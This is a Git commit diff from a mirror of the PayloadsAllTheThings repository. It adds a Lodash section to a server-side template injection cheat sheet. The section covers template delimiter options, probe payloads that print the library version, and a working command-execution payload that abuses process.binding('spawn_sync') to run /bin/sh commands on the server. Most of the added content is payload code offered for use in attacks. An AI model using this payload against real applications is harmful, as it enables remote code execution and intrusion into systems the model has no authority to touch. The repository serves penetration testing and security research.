mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
commit
c030379871
1 changed files with 48 additions and 0 deletions
|
@ -56,6 +56,9 @@
|
|||
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
|
||||
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
|
||||
- [Plugins](#plugins)
|
||||
- [JavaScript - Lodash](#Lodash)
|
||||
- [Lodash - Basic Injection](#Lodash---Basic-Injection)
|
||||
- [Lodash - Command Execution](#Lodash---Command-Execution)
|
||||
- [Python - Mako](#mako)
|
||||
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
|
||||
- [Java - Pebble](#pebble)
|
||||
|
@ -743,6 +746,51 @@ registerPlugin({
|
|||
|
||||
---
|
||||
|
||||
## Lodash
|
||||
|
||||
[Official website](https://lodash.com/docs/4.17.15)
|
||||
|
||||
### Lodash - Basic Injection
|
||||
|
||||
How to create a template:
|
||||
|
||||
```javascript
|
||||
const _ = require('lodash');
|
||||
string = "{{= username}}"
|
||||
const options = {
|
||||
evaluate: /\{\{(.+?)\}\}/g,
|
||||
interpolate: /\{\{=(.+?)\}\}/g,
|
||||
escape: /\{\{-(.+?)\}\}/g,
|
||||
};
|
||||
|
||||
_.template(string, options);
|
||||
```
|
||||
|
||||
- **string:** The template string.
|
||||
- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
|
||||
- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
|
||||
- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
|
||||
|
||||
For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
|
||||
|
||||
```javascript
|
||||
{{= _.VERSION}}
|
||||
${= _.VERSION}
|
||||
<%= _.VERSION %>
|
||||
|
||||
|
||||
{{= _.templateSettings.evaluate }}
|
||||
${= _.VERSION}
|
||||
<%= _.VERSION %>
|
||||
|
||||
```
|
||||
|
||||
### Lodash - Command Execution
|
||||
|
||||
```
|
||||
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
||||
```
|
||||
|
||||
## Mako
|
||||
|
||||
[Official website](https://www.makotemplates.org/)
|
||||
|
|
Loading…
Reference in a new issue